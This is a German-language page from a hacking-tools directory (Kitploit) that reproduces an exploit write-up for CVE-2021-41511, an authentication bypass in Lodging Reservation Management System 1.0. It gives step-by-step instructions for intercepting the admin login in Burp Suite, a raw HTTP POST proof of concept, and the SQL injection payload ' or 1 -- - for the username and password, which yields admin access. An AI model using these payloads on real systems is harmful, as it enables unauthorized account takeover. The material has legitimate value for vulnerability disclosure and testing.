Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-41511 | Kitploit
Tools/GitHubGitHub/vidvansh/cve-2021-41511
Authentifizierung & AutorisierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubvidvansh/cve-2021-41511

CVE-2021-41511

Repository anzeigen
vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-41511

Exploit-Titel: Lodging Reservation Management System 1.0 - SQL-Injection / Authentifizierungs-Bypass

Exploit-Autor: Nitin Sharma(vidvansh)

Hersteller-Website: https://www.sourcecodester.com/php/14883/lodging-reservation-management-system-php-free-source-code.html

Software-Link: https://www.sourcecodester.com/download-code?nid=14883&title=Lodging+Reservation+Management+System+in+PHP+FREE+Source+Code

Version: v1.0

Getestet auf: Windows 10 - XAMPP Server

Beschreibung: Das Passwort-Eingabefeld ist von einer Authentifizierungsumgehung betroffen, die durch unsachgemäße Sanitisierung verursacht wird und Zugriff auf unbefugte Konten ermöglicht.

Schritte zur Reproduktion:

Schritt 1: Rufen Sie das Admin-Panel des Produkts unter http://localhost/lodge/admin/login.php auf. Schritt 2: Geben Sie einen beliebigen Wert für Benutzername und Passwort ein. Schritt 3: Klicken Sie auf Login und fangen Sie die Anfrage in der Burp Suite ab. Schritt 4: Ändern Sie den Benutzernamen zu ' OR 1 -- - und das Passwort zu ' OR 1 -- -. Schritt 5: Klicken Sie auf Forward - Sie werden nun als Admin angemeldet.

PoC:

POST /lodge/classes/Login.php?f=login HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: / Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 49 Origin: http://localhost Connection: close Referer: http://localhost/lodge/admin/login.php Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin

username=+'+or+1%3D1+--+&password=+'+or+1%3D1+--+

Authentifizierungs-Bypass:

Rufen Sie die Admin-Login-Seite auf (http://localhost/lodge/admin/login.php) und verwenden Sie dann das folgende Payload als Benutzername und Passwort =>

Benutzername: ' or 1 -- - Passwort: ' or 1 -- -

Tool herunterladen